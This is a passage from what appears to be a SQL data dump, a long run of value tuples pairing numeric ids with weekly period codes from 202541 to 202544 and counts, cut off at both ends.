1',5),(3259,1,'202541',5),(3269,1,'202541',5),(3282,1,'202541',5),(3482,1,'202541',5),(3710,1,'202541',5),(4326,1,'202541',5),(4332,1,'202541',5),(4341,1,'202541',5),(4368,1,'202541',5),(4404,1,'202541',5),(4428,1,'202541',5),(4524,1,'202541',5),(4542,1,'202541',5),(4546,1,'202541',5),(4674,1,'202541',5),(4697,1,'202541',5),(4706,1,'202541',5),(4744,1,'202541',5),(4747,1,'202541',5),(4792,1,'202541',5),(4866,1,'202541',5),(4878,1,'202541',5),(4893,1,'202541',5),(4988,1,'202541',5),(5033,1,'202541',5),(5042,1,'202541',5),(5050,1,'202541',5),(5128,1,'202541',5),(5131,1,'202541',5),(5248,1,'202541',5),(5256,1,'202541',5),(5264,1,'202541',5),(5268,1,'202541',5),(5289,1,'202541',5),(5310,1,'202541',5),(5314,1,'202541',5),(5326,1,'202541',5),(5359,1,'202541',5),(1600,1,'202541',6),(1608,1,'202541',6),(1705,1,'202541',6),(1724,1,'202541',6),(1730,1,'202541',6),(2150,1,'202541',6),(2609,1,'202541',6),(2617,1,'202541',6),(2704,1,'202541',6),(2751,1,'202541',6),(3027,1,'202541',6),(3030,1,'202541',6),(3090,1,'202541',6),(3109,1,'202541',6),(3124,1,'202541',6),(3240,1,'202541',6),(3263,1,'202541',6),(3267,1,'202541',6),(3316,1,'202541',6),(3479,1,'202541',6),(3498,1,'202541',6),(3534,1,'202541',6),(3724,1,'202541',6),(3727,1,'202541',6),(3746,1,'202541',6),(3749,1,'202541',6),(4323,1,'202541',6),(4444,1,'202541',6),(4520,1,'202541',6),(4566,1,'202541',6),(4591,1,'202541',6),(4648,1,'202541',6),(4700,1,'202541',6),(4709,1,'202541',6),(4756,1,'202541',6),(4762,1,'202541',6),(4771,1,'202541',6),(4776,1,'202541',6),(5028,1,'202541',6),(5080,1,'202541',6),(5140,1,'202541',6),(5157,1,'202541',6),(5292,1,'202541',6),(5334,1,'202541',6),(5353,1,'202541',6),(5356,1,'202541',6),(5363,1,'202541',6),(5585,1,'202541',6),(1711,1,'202541',7),(1715,1,'202541',7),(1739,1,'202541',7),(2165,1,'202541',7),(2297,1,'202541',7),(3063,1,'202541',7),(3066,1,'202541',7),(3489,1,'202541',7),(3531,1,'202541',7),(3764,1,'202541',7),(4275,1,'202541',7),(4391,1,'202541',7),(4400,1,'202541',7),(4517,1,'202541',7),(4651,1,'202541',7),(4677,1,'202541',7),(4681,1,'202541',7),(4688,1,'202541',7),(4694,1,'202541',7),(4703,1,'202541',7),(4753,1,'202541',7),(5134,1,'202541',7),(5146,1,'202541',7),(5271,1,'202541',7),(5301,1,'202541',7),(5307,1,'202541',7),(5317,1,'202541',7),(5320,1,'202541',7),(5330,1,'202541',7),(110,1,'202541',8),(1596,1,'202541',8),(1766,1,'202541',8),(2989,1,'202541',8),(2991,1,'202541',8),(3117,1,'202541',8),(3313,1,'202541',8),(3731,1,'202541',8),(3735,1,'202541',8),(3742,1,'202541',8),(4335,1,'202541',8),(4454,1,'202541',8),(4529,1,'202541',8),(4582,1,'202541',8),(4608,1,'202541',8),(4663,1,'202541',8),(4712,1,'202541',8),(4722,1,'202541',8),(4741,1,'202541',8),(4980,1,'202541',8),(5298,1,'202541',8),(1718,1,'202541',9),(2804,1,'202541',9),(3005,1,'202541',9),(3038,1,'202541',9),(3045,1,'202541',9),(3083,1,'202541',9),(3247,1,'202541',9),(3290,1,'202541',9),(3438,1,'202541',9),(4514,1,'202541',9),(4645,1,'202541',9),(4888,1,'202541',9),(4977,1,'202541',9),(5323,1,'202541',9),(5374,1,'202541',9),(5378,1,'202541',9),(5400,1,'202541',9),(1598,1,'202541',10),(2911,1,'202541',10),(3127,1,'202541',10),(3307,1,'202541',10),(3486,1,'202541',10),(4363,1,'202541',10),(4556,1,'202541',10),(4587,1,'202541',10),(4660,1,'202541',10),(4759,1,'202541',10),(4983,1,'202541',10),(5383,1,'202541',10),(469,1,'202541',11),(1612,1,'202541',11),(2658,1,'202541',11),(3069,1,'202541',11),(3253,1,'202541',11),(4874,1,'202541',11),(5125,1,'202541',11),(5259,1,'202541',11),(5276,1,'202541',11),(2309,1,'202541',12),(3006,1,'202541',12),(3752,1,'202541',12),(1722,1,'202541',13),(2813,1,'202541',13),(4420,1,'202541',13),(4750,1,'202541',13),(5467,1,'202541',13),(5567,1,'202541',13),(3034,1,'202541',14),(3251,1,'202541',14),(5062,1,'202541',14),(5163,1,'202541',14),(5280,1,'202541',14),(5601,1,'202541',14),(467,1,'202541',15),(487,1,'202541',15),(2775,1,'202541',15),(473,1,'202541',16),(5076,1,'202541',16),(1544,1,'202541',17),(1586,1,'202541',17),(5412,1,'202541',17),(5415,1,'202541',17),(3102,1,'202541',18),(3297,1,'202541',18),(3023,1,'202541',19),(5449,1,'202541',19),(5454,1,'202541',19),(5461,1,'202541',19),(5582,1,'202541',19),(87,1,'202541',20),(1728,1,'202541',20),(2503,1,'202541',20),(5428,1,'202541',20),(108,1,'202541',21),(1588,1,'202541',21),(4930,1,'202541',21),(5433,1,'202541',21),(5472,1,'202541',21),(5515,1,'202541',22),(5441,1,'202541',23),(5489,1,'202541',23),(5397,1,'202541',24),(468,1,'202541',25),(3060,1,'202541',25),(5406,1,'202541',25),(4612,1,'202541',26),(5425,1,'202541',26),(5492,1,'202541',26),(74,1,'202541',27),(335,1,'202541',27),(474,1,'202541',27),(3781,1,'202541',27),(5464,1,'202541',27),(5409,1,'202541',28),(5561,1,'202541',29),(5570,1,'202541',29),(84,1,'202541',30),(1778,1,'202541',30),(5593,1,'202541',30),(5598,1,'202541',31),(2904,1,'202541',32),(5457,1,'202541',33),(5512,1,'202541',34),(5578,1,'202541',34),(91,1,'202541',36),(5420,1,'202541',36),(76,1,'202541',38),(89,1,'202541',38),(5436,1,'202541',38),(5502,1,'202541',39),(72,1,'202541',41),(1582,1,'202541',49),(5605,1,'202541',51),(470,1,'202541',56),(68,1,'202541',92),(80,1,'202541',281),(9,1,'202541',2479),(1592,1,'202542',1),(1741,1,'202542',1),(1743,1,'202542',1),(1751,1,'202542',1),(2063,1,'202542',1),(2152,1,'202542',1),(2156,1,'202542',1),(2248,1,'202542',1),(2293,1,'202542',1),(3079,1,'202542',1),(3226,1,'202542',1),(3229,1,'202542',1),(3247,1,'202542',1),(3249,1,'202542',1),(3253,1,'202542',1),(3265,1,'202542',1),(3267,1,'202542',1),(3285,1,'202542',1),(3531,1,'202542',1),(3541,1,'202542',1),(3724,1,'202542',1),(4363,1,'202542',1),(4368,1,'202542',1),(4416,1,'202542',1),(4420,1,'202542',1),(4440,1,'202542',1),(4542,1,'202542',1),(4697,1,'202542',1),(4776,1,'202542',1),(4797,1,'202542',1),(4802,1,'202542',1),(4870,1,'202542',1),(5050,1,'202542',1),(5054,1,'202542',1),(5307,1,'202542',1),(5320,1,'202542',1),(472,1,'202542',2),(484,1,'202542',2),(1701,1,'202542',2),(1709,1,'202542',2),(1715,1,'202542',2),(1720,1,'202542',2),(1747,1,'202542',2),(1768,1,'202542',2),(1772,1,'202542',2),(2148,1,'202542',2),(2150,1,'202542',2),(2609,1,'202542',2),(2956,1,'202542',2),(3090,1,'202542',2),(3124,1,'202542',2),(3240,1,'202542',2),(3263,1,'202542',2),(3280,1,'202542',2),(3430,1,'202542',2),(3438,1,'202542',2),(3482,1,'202542',2),(3714,1,'202542',2),(3764,1,'202542',2),(4326,1,'202542',2),(4341,1,'202542',2),(4357,1,'202542',2),(4382,1,'202542',2),(4387,1,'202542',2),(4391,1,'202542',2),(4404,1,'202542',2),(4408,1,'202542',2),(4444,1,'202542',2),(4674,1,'202542',2),(4677,1,'202542',2),(4685,1,'202542',2),(4691,1,'202542',2),(4694,1,'202542',2),(4703,1,'202542',2),(4747,1,'202542',2),(4765,1,'202542',2),(4858,1,'202542',2),(4866,1,'202542',2),(4976,1,'202542',2),(4980,1,'202542',2),(5020,1,'202542',2),(5028,1,'202542',2),(5037,1,'202542',2),(5046,1,'202542',2),(5067,1,'202542',2),(5071,1,'202542',2),(5080,1,'202542',2),(5137,1,'202542',2),(5146,1,'202542',2),(5253,1,'202542',2),(5256,1,'202542',2),(5268,1,'202542',2),(5271,1,'202542',2),(5289,1,'202542',2),(5292,1,'202542',2),(5330,1,'202542',2),(5356,1,'202542',2),(479,1,'202542',3),(480,1,'202542',3),(570,1,'202542',3),(1695,1,'202542',3),(1699,1,'202542',3),(1707,1,'202542',3),(1726,1,'202542',3),(1730,1,'202542',3),(1737,1,'202542',3),(1739,1,'202542',3),(1770,1,'202542',3),(1782,1,'202542',3),(2154,1,'202542',3),(2161,1,'202542',3),(2165,1,'202542',3),(2296,1,'202542',3),(2751,1,'202542',3),(2991,1,'202542',3),(3004,1,'202542',3),(3005,1,'202542',3),(3087,1,'202542',3),(3096,1,'202542',3),(3104,1,'202542',3),(3107,1,'202542',3),(3109,1,'202542',3),(3243,1,'202542',3),(3251,1,'202542',3),(3261,1,'202542',3),(3269,1,'202542',3),(3479,1,'202542',3),(3486,1,'202542',3),(3489,1,'202542',3),(3498,1,'202542',3),(3738,1,'202542',3),(3746,1,'202542',3),(3771,1,'202542',3),(4275,1,'202542',3),(4373,1,'202542',3),(4428,1,'202542',3),(4436,1,'202542',3),(4457,1,'202542',3),(4520,1,'202542',3),(4546,1,'202542',3),(4657,1,'202542',3),(4706,1,'202542',3),(4744,1,'202542',3),(4768,1,'202542',3),(4862,1,'202542',3),(4883,1,'202542',3),(4888,1,'202542',3),(4893,1,'202542',3),(4988,1,'202542',3),(5033,1,'202542',3),(5131,1,'202542',3),(5295,1,'202542',3),(5317,1,'202542',3),(5334,1,'202542',3),(5359,1,'202542',3),(102,1,'202542',4),(478,1,'202542',4),(483,1,'202542',4),(1596,1,'202542',4),(1602,1,'202542',4),(1713,1,'202542',4),(2178,1,'202542',4),(2252,1,'202542',4),(2617,1,'202542',4),(2801,1,'202542',4),(2964,1,'202542',4),(3045,1,'202542',4),(3063,1,'202542',4),(3092,1,'202542',4),(3097,1,'202542',4),(3245,1,'202542',4),(3275,1,'202542',4),(4238,1,'202542',4),(4323,1,'202542',4),(4329,1,'202542',4),(4338,1,'202542',4),(4400,1,'202542',4),(4454,1,'202542',4),(4514,1,'202542',4),(4651,1,'202542',4),(4700,1,'202542',4),(4753,1,'202542',4),(4759,1,'202542',4),(4792,1,'202542',4),(4897,1,'202542',4),(5042,1,'202542',4),(5140,1,'202542',4),(5153,1,'202542',4),(5248,1,'202542',4),(5264,1,'202542',4),(5310,1,'202542',4),(5314,1,'202542',4),(5323,1,'202542',4),(5326,1,'202542',4),(5585,1,'202542',4),(477,1,'202542',5),(485,1,'202542',5),(2159,1,'202542',5),(2748,1,'202542',5),(2993,1,'202542',5),(3027,1,'202542',5),(3030,1,'202542',5),(3034,1,'202542',5),(3038,1,'202542',5),(3117,1,'202542',5),(3257,1,'202542',5),(3259,1,'202542',5),(3287,1,'202542',5),(3316,1,'202542',5),(3534,1,'202542',5),(3721,1,'202542',5),(3735,1,'202542',5),(4377,1,'202542',5),(4396,1,'202542',5),(4432,1,'202542',5),(4448,1,'202542',5),(4517,1,'202542',5),(4529,1,'202542',5),(4566,1,'202542',5),(4591,1,'202542',5),(4608,1,'202542',5),(4645,1,'202542',5),(4648,1,'202542',5),(4660,1,'202542',5),(4668,1,'202542',5),(4688,1,'202542',5),(4709,1,'202542',5),(4762,1,'202542',5),(5024,1,'202542',5),(5276,1,'202542',5),(5301,1,'202542',5),(471,1,'202542',6),(476,1,'202542',6),(488,1,'202542',6),(1590,1,'202542',6),(1612,1,'202542',6),(1614,1,'202542',6),(1705,1,'202542',6),(1734,1,'202542',6),(1745,1,'202542',6),(2558,1,'202542',6),(3041,1,'202542',6),(3066,1,'202542',6),(3271,1,'202542',6),(3777,1,'202542',6),(4524,1,'202542',6),(4681,1,'202542',6),(4722,1,'202542',6),(4756,1,'202542',6),(4771,1,'202542',6),(4977,1,'202542',6),(5101,1,'202542',6),(5157,1,'202542',6),(5374,1,'202542',6),(5383,1,'202542',6),(110,1,'202542',7),(482,1,'202542',7),(486,1,'202542',7),(1594,1,'202542',7),(1703,1,'202542',7),(1711,1,'202542',7),(1776,1,'202542',7),(2457,1,'202542',7),(2769,1,'202542',7),(2965,1,'202542',7),(3006,1,'202542',7),(3023,1,'202542',7),(3072,1,'202542',7),(3127,1,'202542',7),(3282,1,'202542',7),(3710,1,'202542',7),(3774,1,'202542',7),(4301,1,'202542',7),(4412,1,'202542',7),(4712,1,'202542',7),(4741,1,'202542',7),(4878,1,'202542',7),(4996,1,'202542',7),(5472,1,'202542',7),(1600,1,'202542',8),(1718,1,'202542',8),(1749,1,'202542',8),(1766,1,'202542',8),(1780,1,'202542',8),(2809,1,'202542',8),(3278,1,'202542',8),(3307,1,'202542',8),(3313,1,'202542',8),(3727,1,'202542',8),(3752,1,'202542',8),(4332,1,'202542',8),(4582,1,'202542',8),(4654,1,'202542',8),(5058,1,'202542',8),(5134,1,'202542',8),(5298,1,'202542',8),(5582,1,'202542',8),(469,1,'202542',9),(481,1,'202542',9),(1610,1,'202542',9),(1724,1,'202542',9),(1728,1,'202542',9),(2989,1,'202542',9),(3290,1,'202542',9),(3731,1,'202542',9),(3749,1,'202542',9),(4551,1,'202542',9),(4750,1,'202542',9),(1722,1,'202542',10),(2804,1,'202542',10),(4335,1,'202542',10),(4587,1,'202542',10),(4663,1,'202542',10),(4874,1,'202542',10),(5122,1,'202542',10),(5128,1,'202542',10),(5280,1,'202542',10),(5353,1,'202542',10),(5378,1,'202542',10),(2309,1,'202542',11),(3297,1,'202542',11),(5125,1,'202542',11),(5412,1,'202542',11),(5425,1,'202542',11),(5464,1,'202542',11),(1584,1,'202542',12),(5062,1,'202542',12),(5304,1,'202542',12),(5457,1,'202542',12),(1604,1,'202542',13),(2911,1,'202542',13),(5076,1,'202542',13),(5259,1,'202542',13),(5363,1,'202542',13),(1588,1,'202542',14),(1606,1,'202542',14),(1774,1,'202542',14),(2658,1,'202542',14),(2813,1,'202542',14),(3069,1,'202542',14),(4983,1,'202542',14),(5433,1,'202542',14),(5461,1,'202542',14),(4556,1,'202542',15),(4612,1,'202542',15),(5449,1,'202542',15),(5467,1,'202542',15),(1598,1,'202542',16),(1608,1,'202542',16),(2775,1,'202542',16),(5400,1,'202542',16),(5567,1,'202542',16),(3083,1,'202542',17),(5409,1,'202542',17),(5415,1,'202542',17),(5489,1,'202542',18),(5515,1,'202542',18),(87,1,'202542',19),(487,1,'202542',19),(2297,1,'202542',19),(4930,1,'202542',19),(5441,1,'202542',19),(5578,1,'202542',19),(1544,1,'202542',20),(2704,1,'202542',20),(3102,1,'202542',20),(5436,1,'202542',20),(5454,1,'202542',20),(473,1,'202542',21),(1778,1,'202542',21),(5561,1,'202542',21),(5492,1,'202542',22),(5570,1,'202542',22),(3060,1,'202542',23),(3781,1,'202542',23),(5428,1,'202542',23),(5512,1,'202542',24),(5601,1,'202542',24),(108,1,'202542',25),(1586,1,'202542',25),(474,1,'202542',26),(5598,1,'202542',26),(84,1,'202542',27),(335,1,'202542',27),(2503,1,'202542',27),(5163,1,'202542',27),(5397,1,'202542',27),(74,1,'202542',29),(2904,1,'202542',29),(76,1,'202542',31),(468,1,'202542',31),(5593,1,'202542',31),(91,1,'202542',35),(5406,1,'202542',35),(89,1,'202542',36),(467,1,'202542',36),(5420,1,'202542',36),(5502,1,'202542',41),(72,1,'202542',50),(1582,1,'202542',51),(5605,1,'202542',56),(68,1,'202542',83),(470,1,'202542',83),(80,1,'202542',132),(9,1,'202542',1957),(1747,1,'202543',1),(2252,1,'202543',1),(2748,1,'202543',1),(3764,1,'202543',1),(4428,1,'202543',1),(4546,1,'202543',1),(4706,1,'202543',1),(5122,1,'202543',1),(5131,1,'202543',1),(5271,1,'202543',1),(106,1,'202543',2),(1697,1,'202543',2),(1709,1,'202543',2),(1711,1,'202543',2),(1720,1,'202543',2),(1739,1,'202543',2),(1749,1,'202543',2),(1776,1,'202543',2),(2150,1,'202543',2),(2156,1,'202543',2),(3027,1,'202543',2),(3041,1,'202543',2),(3229,1,'202543',2),(3245,1,'202543',2),(4323,1,'202543',2),(4335,1,'202543',2),(4436,1,'202543',2),(4440,1,'202543',2),(4893,1,'202543',2),(5298,1,'202543',2),(480,1,'202543',3),(1737,1,'202543',3),(1743,1,'202543',3),(2165,1,'202543',3),(2178,1,'202543',3),(2296,1,'202543',3),(3005,1,'202543',3),(3240,1,'202543',3),(3257,1,'202543',3),(3261,1,'202543',3),(3269,1,'202543',3),(3746,1,'202543',3),(3771,1,'202543',3),(4238,1,'202543',3),(4329,1,'202543',3),(4338,1,'202543',3),(4373,1,'202543',3),(4377,1,'202543',3),(4424,1,'202543',3),(4514,1,'202543',3),(4700,1,'202543',3),(4741,1,'202543',3),(4744,1,'202543',3),(4771,1,'202543',3),(4797,1,'202543',3),(4883,1,'202543',3),(4897,1,'202543',3),(4996,1,'202543',3),(5020,1,'202543',3),(5024,1,'202543',3),(5101,1,'202543',3),(1699,1,'202543',4),(1701,1,'202543',4),(1713,1,'202543',4),(1741,1,'202543',4),(1770,1,'202543',4),(1774,1,'202543',4),(2148,1,'202543',4),(2609,1,'202543',4),(3090,1,'202543',4),(3243,1,'202543',4),(3247,1,'202543',4),(3263,1,'202543',4),(3275,1,'202543',4),(3735,1,'202543',4),(3742,1,'202543',4),(4275,1,'202543',4),(4363,1,'202543',4),(4396,1,'202543',4),(4408,1,'202543',4),(4444,1,'202543',4),(4457,1,'202543',4),(4524,1,'202543',4),(4645,1,'202543',4),(4654,1,'202543',4),(4657,1,'202543',4),(4709,1,'202543',4),(4756,1,'202543',4),(4802,1,'202543',4),(4858,1,'202543',4),(4862,1,'202543',4),(4866,1,'202543',4),(4988,1,'202543',4),(5037,1,'202543',4),(5042,1,'202543',4),(5050,1,'202543',4),(5054,1,'202543',4),(5080,1,'202543',4),(5134,1,'202543',4),(5256,1,'202543',4),(5289,1,'202543',4),(5304,1,'202543',4),(477,1,'202543',5),(570,1,'202543',5),(1707,1,'202543',5),(1726,1,'202543',5),(1730,1,'202543',5),(1732,1,'202543',5),(1734,1,'202543',5),(1751,1,'202543',5),(1772,1,'202543',5),(2293,1,'202543',5),(2617,1,'202543',5),(2801,1,'202543',5),(2964,1,'202543',5),(2991,1,'202543',5),(3066,1,'202543',5),(3079,1,'202543',5),(3104,1,'202543',5),(3109,1,'202543',5),(3316,1,'202543',5),(3479,1,'202543',5),(3498,1,'202543',5),(3541,1,'202543',5),(3727,1,'202543',5),(3738,1,'202543',5),(4332,1,'202543',5),(4341,1,'202543',5),(4368,1,'202543',5),(4454,1,'202543',5),(4591,1,'202543',5),(4648,1,'202543',5),(4674,1,'202543',5),(4677,1,'202543',5),(4762,1,'202543',5),(4792,1,'202543',5),(5058,1,'202543',5),(5248,1,'202543',5),(5292,1,'202543',5),(5314,1,'202543',5),(5320,1,'202543',5),(5353,1,'202543',5),(5359,1,'202543',5),(471,1,'202543',6),(1610,1,'202543',6),(1745,1,'202543',6),(1768,1,'202543',6),(2154,1,'202543',6),(2248,1,'202543',6),(2457,1,'202543',6),(2809,1,'202543',6),(2965,1,'202543',6),(2989,1,'202543',6),(3004,1,'202543',6),(3006,1,'202543',6),(3034,1,'202543',6),(3087,1,'202543',6),(3278,1,'202543',6),(3282,1,'202543',6),(3430,1,'202543',6),(3531,1,'202543',6),(3534,1,'202543',6),(3710,1,'202543',6),(3714,1,'202543',6),(3731,1,'202543',6),(3774,1,'202543',6),(4357,1,'202543',6),(4387,1,'202543',6),(4391,1,'202543',6),(4432,1,'202543',6),(4582,1,'202543',6),(4668,1,'202543',6),(4697,1,'202543',6),(4747,1,'202543',6),(4759,1,'202543',6),(4765,1,'202543',6),(4768,1,'202543',6),(4870,1,'202543',6),(4976,1,'202543',6),(5028,1,'202543',6),(5033,1,'202543',6),(5137,1,'202543',6),(5264,1,'202543',6),(5334,1,'202543',6),(5356,1,'202543',6),(5472,1,'202543',6),(5609,1,'202543',6),(478,1,'202543',7),(481,1,'202543',7),(486,1,'202543',7),(1590,1,'202543',7),(1614,1,'202543',7),(1703,1,'202543',7),(1724,1,'202543',7),(1780,1,'202543',7),(2159,1,'202543',7),(2558,1,'202543',7),(2751,1,'202543',7),(2804,1,'202543',7),(3063,1,'202543',7),(3092,1,'202543',7),(3096,1,'202543',7),(3107,1,'202543',7),(3226,1,'202543',7),(3253,1,'202543',7),(3265,1,'202543',7),(3280,1,'202543',7),(3438,1,'202543',7),(3482,1,'202543',7),(3489,1,'202543',7),(3752,1,'202543',7),(4301,1,'202543',7),(4326,1,'202543',7),(4382,1,'202543',7),(4551,1,'202543',7),(4685,1,'202543',7),(4688,1,'202543',7),(4703,1,'202543',7),(4753,1,'202543',7),(4888,1,'202543',7),(5067,1,'202543',7),(5071,1,'202543',7),(5253,1,'202543',7),(5295,1,'202543',7),(5317,1,'202543',7),(102,1,'202543',8),(483,1,'202543',8),(1584,1,'202543',8),(1592,1,'202543',8),(1596,1,'202543',8),(1612,1,'202543',8),(1705,1,'202543',8),(1715,1,'202543',8),(1766,1,'202543',8),(1782,1,'202543',8),(2152,1,'202543',8),(2993,1,'202543',8),(3249,1,'202543',8),(3285,1,'202543',8),(3721,1,'202543',8),(3777,1,'202543',8),(4404,1,'202543',8),(4517,1,'202543',8),(4608,1,'202543',8),(4660,1,'202543',8),(4694,1,'202543',8),(4712,1,'202543',8),(5046,1,'202543',8),(5125,1,'202543',8),(5140,1,'202543',8),(5268,1,'202543',8),(5301,1,'202543',8),(5307,1,'202543',8),(5323,1,'202543',8),(476,1,'202543',9),(479,1,'202543',9),(482,1,'202543',9),(488,1,'202543',9),(1600,1,'202543',9),(1695,1,'202543',9),(2775,1,'202543',9),(3045,1,'202543',9),(3060,1,'202543',9),(3069,1,'202543',9),(3072,1,'202543',9),(3097,1,'202543',9),(3271,1,'202543',9),(3287,1,'202543',9),(3290,1,'202543',9),(3486,1,'202543',9),(4529,1,'202543',9),(4587,1,'202543',9),(4722,1,'202543',9),(4980,1,'202543',9),(5326,1,'202543',9),(5374,1,'202543',9),(110,1,'202543',10),(469,1,'202543',10),(472,1,'202543',10),(484,1,'202543',10),(485,1,'202543',10),(1604,1,'202543',10),(1606,1,'202543',10),(2063,1,'202543',10),(2658,1,'202543',10),(3124,1,'202543',10),(3127,1,'202543',10),(3251,1,'202543',10),(3267,1,'202543',10),(4520,1,'202543',10),(4556,1,'202543',10),(4651,1,'202543',10),(4663,1,'202543',10),(4691,1,'202543',10),(4776,1,'202543',10),(5157,1,'202543',10),(5330,1,'202543',10),(1728,1,'202543',11),(2769,1,'202543',11),(3023,1,'202543',11),(3117,1,'202543',11),(3273,1,'202543',11),(3307,1,'202543',11),(3313,1,'202543',11),(3749,1,'202543',11),(4400,1,'202543',11),(4412,1,'202543',11),(4416,1,'202543',11),(4420,1,'202543',11),(4874,1,'202543',11),(4983,1,'202543',11),(5128,1,'202543',11),(5146,1,'202543',11),(5310,1,'202543',11),(5383,1,'202543',11),(5467,1,'202543',11),(5582,1,'202543',11),(1594,1,'202543',12),(1718,1,'202543',12),(2911,1,'202543',12),(3038,1,'202543',12),(4566,1,'202543',12),(4750,1,'202543',12),(5378,1,'202543',12),(2161,1,'202543',13),(2956,1,'202543',13),(3030,1,'202543',13),(5585,1,'202543',13),(3083,1,'202543',14),(3724,1,'202543',14),(4681,1,'202543',14),(4878,1,'202543',14),(5153,1,'202543',14),(1588,1,'202543',15),(1602,1,'202543',15),(4977,1,'202543',15),(5062,1,'202543',15),(5163,1,'202543',15),(5363,1,'202543',15),(5400,1,'202543',15),(5276,1,'202543',16),(5397,1,'202543',16),(5425,1,'202543',16),(1608,1,'202543',17),(3102,1,'202543',17),(5433,1,'202543',17),(487,1,'202543',18),(5428,1,'202543',18),(3297,1,'202543',19),(5280,1,'202543',19),(5406,1,'202543',19),(5512,1,'202543',19),(5561,1,'202543',19),(2309,1,'202543',20),(2503,1,'202543',20),(2813,1,'202543',20),(3259,1,'202543',20),(4612,1,'202543',20),(5601,1,'202543',20),(1722,1,'202543',21),(2297,1,'202543',21),(5259,1,'202543',21),(5515,1,'202543',21),(4930,1,'202543',22),(5076,1,'202543',22),(5436,1,'202543',22),(5441,1,'202543',22),(5461,1,'202543',22),(5489,1,'202543',22),(5454,1,'202543',23),(5567,1,'202543',23),(1544,1,'202543',24),(5593,1,'202543',24),(473,1,'202543',25),(1598,1,'202543',25),(5412,1,'202543',25),(5464,1,'202543',25),(5578,1,'202543',25),(84,1,'202543',26),(108,1,'202543',26),(1586,1,'202543',26),(2704,1,'202543',26),(5415,1,'202543',26),(5449,1,'202543',26),(5598,1,'202543',26),(74,1,'202543',27),(335,1,'202543',27),(474,1,'202543',27),(3781,1,'202543',27),(5409,1,'202543',27),(5492,1,'202543',27),(5502,1,'202543',28),(5457,1,'202543',30),(5570,1,'202543',30),(87,1,'202543',31),(2904,1,'202543',32),(468,1,'202543',33),(1778,1,'202543',36),(5420,1,'202543',37),(91,1,'202543',40),(76,1,'202543',45),(72,1,'202543',47),(89,1,'202543',47),(467,1,'202543',48),(1582,1,'202543',63),(5605,1,'202543',63),(470,1,'202543',93),(68,1,'202543',99),(80,1,'202543',155),(9,1,'202543',2516),(5033,1,'202544',1),(2152,1,'202544',2),(2296,1,'202544',2),(4888,1,'202544',2),(5058,1,'202544',2),(2751,1,'202544',3),(2965,1,'202544',3),(5046,1,'202544',3),(106,1,'202544',4),(1590,1,'202544',4),(3096,1,'202544',4),(3265,1,'202544',4),(3498,1,'202544',4),(4416,1,'202544',4),(4802,1,'202544',4),(4897,1,'202544',4),(5101,1,'202544',4),(5256,1,'202544',4),(5330,1,'202544',4),(102,1,'202544',5),(478,1,'202544',5),(482,1,'202544',5),(486,1,'202544',5),(1774,1,'202544',5),(1782,1,'202544',5),(2063,1,'202544',5),(2150,1,'202544',5),(2748,1,'202544',5),(3004,1,'202544',5),(3245,1,'202544',5),(3269,1,'202544',5),(4382,1,'202544',5),(4396,1,'202544',5),(5054,1,'202544',5),(5067,1,'202544',5),(5122,1,'202544',5),(5140,1,'202544',5),(5253,1,'202544',5),(5310,1,'202544',5),(5359,1,'202544',5),(484,1,'202544',6),(570,1,'202544',6),(1697,1,'202544',6),(1703,1,'202544',6),(1726,1,'202544',6),(2148,1,'202544',6),(2178,1,'202544',6),(2617,1,'202544',6),(2991,1,'202544',6),(3005,1,'202544',6),(3247,1,'202544',6),(3249,1,'202544',6),(3287,1,'202544',6),(3482,1,'202544',6),(4404,1,'202544',6),(4797,1,'202544',6),(4858,1,'202544',6),(4866,1,'202544',6),(4976,1,'202544',6),(4996,1,'202544',6),(5020,1,'202544',6),(5024,1,'202544',6),(5264,1,'202544',6),(5292,1,'202544',6),(5326,1,'202544',6),(5378,1,'202544',6),(476,1,'202544',7),(483,1,'202544',7),(1584,1,'202544',7),(1594,1,'202544',7),(1715,1,'202544',7),(1720,1,'202544',7),(1737,1,'202544',7),(1772,1,'202544',7),(1776,1,'202544',7),(1780,1,'202544',7),(2964,1,'202544',7),(3087,1,'202544',7),(3226,1,'202544',7),(3243,1,'202544',7),(3253,1,'202544',7),(3267,1,'202544',7),(3278,1,'202544',7),(3531,1,'202544',7),(3727,1,'202544',7),(4357,1,'202544',7),(4387,1,'202544',7),(4391,1,'202544',7),(4428,1,'202544',7),(4444,1,'202544',7),(4448,1,'202544',7),(4551,1,'202544',7),(4587,1,'202544',7),(4862,1,'202544',7),(4874,1,'202544',7),(4893,1,'202544',7),(5050,1,'202544',7),(5131,1,'202544',7),(5157,1,'202544',7),(5248,1,'202544',7),(5472,1,'202544',7),(481,1,'202544',8),(485,1,'202544',8),(1709,1,'202544',8),(1739,1,'202544',8),(2154,1,'202544',8),(2159,1,'202544',8),(2161,1,'202544',8),(2252,1,'202544',8),(2293,1,'202544',8),(2609,1,'202544',8),(2801,1,'202544',8),(3027,1,'202544',8),(3092,1,'202544',8),(3097,1,'202544',8),(3104,1,'202544',8),(3109,1,'202544',8),(3229,1,'202544',8),(3240,1,'202544',8),(3261,1,'202544',8),(3263,1,'202544',8),(4363,1,'202544',8),(4412,1,'202544',8),(4436,1,'202544',8),(4454,1,'202544',8),(4700,1,'202544',8),(4722,1,'202544',8),(4792,1,'202544',8),(4883,1,'202544',8),(4980,1,'202544',8),(4988,1,'202544',8),(5037,1,'202544',8),(5071,1,'202544',8),(5128,1,'202544',8),(5146,1,'202544',8),(5271,1,'202544',8),(5289,1,'202544',8),(5295,1,'202544',8),(5298,1,'202544',8),(5304,1,'202544',8),(5323,1,'202544',8),(5334,1,'202544',8),(5374,1,'202544',8),(1610,1,'202544',9),(1614,1,'202544',9),(1695,1,'202544',9),(1699,1,'202544',9),(1732,1,'202544',9),(1745,1,'202544',9),(1768,1,'202544',9),(3072,1,'202544',9),(3107,1,'202544',9),(3257,1,'202544',9),(3280,1,'202544',9),(3282,1,'202544',9),(3285,1,'202544',9),(3771,1,'202544',9),(4326,1,'202544',9),(4432,1,'202544',9),(4440,1,'202544',9),(4524,1,'202544',9),(4529,1,'202544',9),(4608,1,'202544',9),(4668,1,'202544',9),(4677,1,'202544',9),(4694,1,'202544',9),(4762,1,'202544',9),(4878,1,'202544',9),(5080,1,'202544',9),(5137,1,'202544',9),(5268,1,'202544',9),(5609,1,'202544',9),(5626,1,'202544',9),(477,1,'202544',10),(479,1,'202544',10),(1592,1,'202544',10),(1604,1,'202544',10),(1707,1,'202544',10),(1713,1,'202544',10),(1724,1,'202544',10),(1730,1,'202544',10),(1749,1,'202544',10),(1751,1,'202544',10),(2165,1,'202544',10),(2457,1,'202544',10),(2989,1,'202544',10),(3030,1,'202544',10),(3041,1,'202544',10),(3066,1,'202544',10),(3090,1,'202544',10),(3117